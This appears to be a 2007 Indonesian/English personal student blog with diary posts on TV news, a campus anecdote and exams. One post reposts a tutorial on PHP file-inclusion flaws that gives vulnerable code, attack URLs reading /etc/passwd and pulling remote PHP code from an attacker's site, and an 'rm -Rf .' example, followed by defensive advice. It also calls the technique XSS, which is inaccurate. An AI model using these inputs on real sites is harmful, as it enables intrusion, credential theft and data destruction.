Saturday, January 20, 2007

bayi koala wallaby dengan orang miskin diindonesia | koala's baby wallaby with poor poeple in indonesia

ketika aku menonton metro tv sore tadi ,di australia ada semacam rumah sakit bagi koala wallaby (kanguru ) agar tidak sakit dimaksudkan agar tidak punah, sedangkan di indonesia banyak orang yang menganggur , bagaimana ya agar seperti mereka masih bisa memikirkan masalah hewan yang terancam punah.
berikutnya ada berita tentang mosi tidak percaya dari masyarakat kepada SBY ,agar SBY mengundurkan diri menurutku hal tersebut salah, seharusnya SBY dan pemerintahannya di berikan DRAFT .yang berisi tentang apa yang harus di lakukan SBY jikalau dia memang tidak tau apa yang harus di lakukan

tes

tes

Wednesday, January 17, 2007

lumpur lapindo & pengungsinya | lapindo mud & refugee

Jam 05:00 sore ada berita di tv bahwa selam ini korban lumpur lapindo di beri nasi basi oleh pusat bantuan makanan , Banyak dari pengungsi berunjuk rasa didepan kantor yang bertanggung jawab akan hal tersebut.


fuf......... seandainya kita yang jadi pengungsi bagai mana ya :( .


At 05:00 PM I watch tv that Refugee of mud lapindo get rice that cannot eat, many of this refugee stand up at public building which manage this problem.

fuf ....... if i became this refugee :( .

Tuesday, January 16, 2007

Ayah Ibu Anak & pak satpam | Father Mom teneeger & security officer

Tengah malam tadi , saat dingin - dinginnya ,belajar HTML Basic ,datang ke lantai 4 gedung labkom seorang satpam beserta dua orang yang lebih pantas di sebut ibu dan bapak terjadi percakapan:

satpam : "Pak, ini ada orang tua yang mencari anaknya ,namanya susi !"

Sejenak aku berpikir apa benar aku yang masih berusia 20 tahun di sebut Bapak kemudian
temanku si Hume yang sedang mengerjakan tugas juga ikut beranjak dari tempat duduknya.

Aku :" oh, Tidak ada yang bernama Susi"
Sang Bapak : "Dia sedang KKP semester 9 ."
Aku : " maaf Pak ,Disini setelah pukul sembilan tidak ada kegiatan mahasiswa, yang
ada disini para asisten yang sedang mengerjakan tugas dari Dosen."

Sang Bapak : "oh ... , Kalau begitu Terima Kasih ya Pak."

Kemudian sang Bapak, satpam, dan ibu itu meninggalkan lantai empat dengan berharap
harap cemas , pikirku.

Dari kejadian diatas aku pernah loh dikira bapak-bapak.Ceritanya ketika naik metromini 69
ingin ke blok M di tagih oleh kernet supir ketika membayar ongkos :

Kernet : "Pak, uangnya kurang Rp 500,00;- lagi, "
Aku : "Mas, Saya ini pelajar ,ngga liat pake celana sekolah :( "
Kernet : "Maaf.Dik"

fuh memang aku pantas di sebut bapak ya ? :) .

In the last midnight, when wind getting cold, beside learning HTML Basic, a fourth of labkom floor came by a officer security, a old man, a old women then discoursing happend between us:

security officer : "Mr, There is a parent of student who is looking for his child, Susi"

At the momment, i was thingking which allright, I called Mr,w hereas i'm still teeneger then
my friend Hume that was working his homework, getting up from his chair ,get on us.

me : "oh, there is not susi's name"
a old man: "She is working a paper for his graduate, nineth grade at this time"
me :"Pardon me , After 09:00 pm no students activity in this room even in this university just lecture assistance who work task from his/her lecture"
an old man:"oh ....., thanks for your attention"



Then an old man, security officer and old women walk away from this room with worry in his\her hearth.

From this subject,I ever pretend as old man too .The story begin when im still high school student, i use public transportation to blok M area . when dunnig by bus ticketing :

Bus ticketing : "mr, the money which you give to me less a penny ?".
me : "hei, i was young, Don't you see my pants(i use school pant) ".
Bus ticketing : "sorry,boy".

fuhhh , Should I call mr ? :) .

Sunday, January 14, 2007

sql injection atau code injection

Masalah Code Injection

dikutip dari:
http://www.daunsalam.net/artikel/codeinjection.htm
maaf tidak ada bahasa inggrinya kepanjangan

Mohon Perhatian. Artikel ini berisi informasi layaknya pisau bermata dua. Maksud utamanya adalah menjelaskan salah satu masalah dalam menulis kode program dengan PHP. Tentu setelah itu, bisa menjadi perhatian agar berhati-hati. Namun otomatis, ini juga memberi pelajaran bagaimana caranya "menggunakan" kelemahan tersebut untuk hal yang bersifat merusak. Dan sungguh, saya mengharapkan tidak dimanfaatkan untuk hal negatif tersebut.
Kita mulai dengan sebuah potongan kode program PHP seperti berikut ini.


# file malam.php


echo "Hallo, Selamat Malam";
?>

# file halo.php


echo "Hallo, Apa Kabar?\n";
include "malam.php";
?>


Bila file halo.php diakses melalui browser, maka akan kita peroleh kalimat

Hallo, Apa Kabar?
Hallo, Selamat Malam


Dengan me-include-kan sebuah file php dalam file php lain, maka file tersebut juga akan dieksekusi. Jadi, seperti contoh di atas, maka dalam file halo.php di-include-kan file malam.php, sehingga kita juga memperoleh apa yang dilakukan oleh file malam.phpDemikian gambaran sederhana tentang melakukan include dalam program PHP.
Biasanya cara me-include-kan file lain dalam sebuah program PHP sangat sering dilakukan. Salah satu maksudnya adalah memudahkan dalam menghasilkan sebuah halaman web. Sebuah file php, misalnya bertugas khusus menjadi kerangka untuk file php yang lain. Dan dalam prakteknya tinggal panggil file kerangka ini, lalu kirim variabel ke file tersebut yang berisi nama file lain yang akan ikut ditampilkan melalui file kerangka ini.
Kecelakaan lalu timbul, karena nama file yang akan diikutkan tersebut dikirim melalui variabel dari luar, misal GET atau POST. Dilengkapi dengan kelalaian tidak melakukan pemeriksaan terlebih dahulu terhadap variabel yang masuk ini, maka celah untuk code injection sudah mulai terbuka. Biasanya berbentuk seperti berikut ini

# file komentar.php
$fileisi = $HTTP_GET_VARS['f'];
include "$fileisi";
//... kode-kode lain
?>

Untuk mengakses komentar.php di atas, pada addres bar browser akan ditulis seperti ini
http://situskorban.com/komentar.php?f=hal2.php


maka ditampilkanlah pada browser data yang ada dalam file hal2.php tersebut. Dengan keadaan di atas, maka orang yang mengakses situs tersebut, bisa saja mengganti hal2.php dengan sesuatu yang lain. Misalnya hal2.php diganti dengan /etc/passwd seperti berikut


http://situskorban.com/komentar.php?f=/etc/passwd


menurut anda apa yang akan tampil pada halaman browser anda ? Jika file /etc/passwd tersebut bisa dibaca oleh PHP, maka artinya isi file tersebut akan muncul di browser. Jelas ini sebuah masalah. Ada sekian banyak orang "tertarik" dengan hal-hal semacam ini, dan kita perlu waspada.
Sampai pada bagian ini, kita bisa melihat bahayanya adalah orang lain bisa memanfaatkan celah tersebut untuk melihat berbagai file yang mungkin untuk diakses oleh script yang bermasalah tersebut. Kalau kebetulan seseorang tersebut bisa menemukan file yang berisi user dan password. Aha! Itu dia.
Sekarang kita lanjutkan ceritanya. Jika opsi untuk allow_url_fopen pada file konfigurasi PHP bernilai true (dan default untuk nilai ini memang true) disinilah ancaman itu semakin menganga lebar. Kita kembali ke contoh di atas.

http://situskorban.com/komentar.php?f=http://esek2.com/index.htm


Nah sekarang kita bisa melihat web http://esek2.com/index.htm
berada dalam situs
http://situskorban.com/komentar.php

Lalu di mana bahanya ? Kalau hanya menampilkan situs lain, dan itupun hanya kita sendiri yang terkena dampaknya, tentu tidak ada bahaya. Sebab dengan cara di atas tidak ada perubahan permanen terjadi. Jadi, sampai di sini juga belum ada apa-apanya.
Sekarang kita buat skenario begini. Kita buat sebuah file php yang isinya sederhana saja, misal

# file info.php
php
phpinfo();
?>



Dan kebetulan lagi kita punya sebuah situs, misalnya kita sebut situs A yang bisa kita isi dengan file ini. Jadi dengan mengakses ke situs A, seperti berikut ini, kita akan memperoleh informasi PHP pada server situs A.

http://situsA.com/info.php


Lalu, kembali ke situskorban.com yang memiliki celah tadi,
http://situskorban.com/komentar.php?f=http://situsA.com/info.php


Kita akan mendapatkan halaman tersebut berisi info php yang ternyata masih merupakan info php situsA. Jadi tak ada bahaya. Mengapa ? Karena ketika permintaan dilakukan oleh situskorban.com ke situsA, maka situsA memperlakukan file info.php sebagai file php yang harus dieksekusi terlebih dahulu, baru kemudian hasilnya diberikan ke situskorban.com
Dan ini dia masalah itu. Sekarang ganti nama file tadi misalnya dengan info.tes. Lalu akses situskorban dengan cara berikut

http://situskorban.com/komentar.php?f=http://situsA.com/info.tes


Bla! sekarang yang muncul adalah info php dari situskorban. Ini artinya kita sudah bisa menyusupkan script php agar berjalan di situskorban. Coba bayangkan lagi, jika isi dari info.tes tadi adalah script untuk mengganti isi file lain, atau isinya hanyalah sebuah perintah berupa `rm -Rf .` Bisa kiamat! Kira-kira inilah yang bisa disebut dengan Code Injection melalui XSS (Cross Site Scripting)
Antisipasi
Berikut ini cara yang mungkin untuk menghindari kasus seperti di atas :

Beri perhatian serius terhadap variabel yang datangnya dari luar.
Hati-hati terhadap variabel yang datangnya dari luar.
Periksa dengan teliti terhadap variabel yang datangnya dari luar.
Sekali lagi, awas variabel yang datang dari luar :) (Paranoid nih...)
Sebaiknya tidak langsung menggunakan variabel dari luar untuk dieksekusi. Untuk kasus di atas, bisa saja variabel dari luar hanya berupa angka, lalu lakukan swicth untuk memilih halaman yang akan di-include berdasarkan angka tersebut. Jika angka tak valid, langsung saja ke halaman standar, misal menampilkan index.php

Saturday, January 13, 2007

Postingan ke 2

Hari ini ,dua hari lagi ujian jarkom & matematika padahal baru saja membersihkan 36 komputer untuk diganti dengan komputer yang baru. Seandainya orang lain yang jadi aku mungkin dia lebih memilih belajar di rumah atau belajar kelompok dengan teman-temannya, tapi aku percaya nasib jikalau aku mengerjakan dengan ikhlas pasti mendapat balasan yang setimpal. Berharap ujianku dapat dilalui dengan nilai yang baik Amin , Semoga tuhan mendengar.
Today ,Third of this day I will exam Computer Network & mathemathics whereas I just cleaned 36 amount of computer to change with new computer. Supposing anypeople become me, maybe he most chose learn for studing or learn with his/her friends, but I belief of destiny which mean although i work with sincerity , the result get same as what i do.

Friday, January 12, 2007

my first blog in blogspot.com

Today, I'm just making my first blog. Pushing is curiousity how do introduce my self in surfing web. Thanks for Allah SWT which give me breathing so I can live until now and his prophet Muhammad SAW whom his messenger in this world.
Hari ini, Saya baru saja membuat blog pertama saya .Didorong oleh rasa keingintahuan bagaimana cara saya mengenalkan diri saya di dunia maya.terima kasih kepada Allah SWT yang memberikan saya nafas sehingga saya mampu hidup hingga saat ini dan junjungan nabi muhammad SAWyang merupakan penyampai pesan di dunia.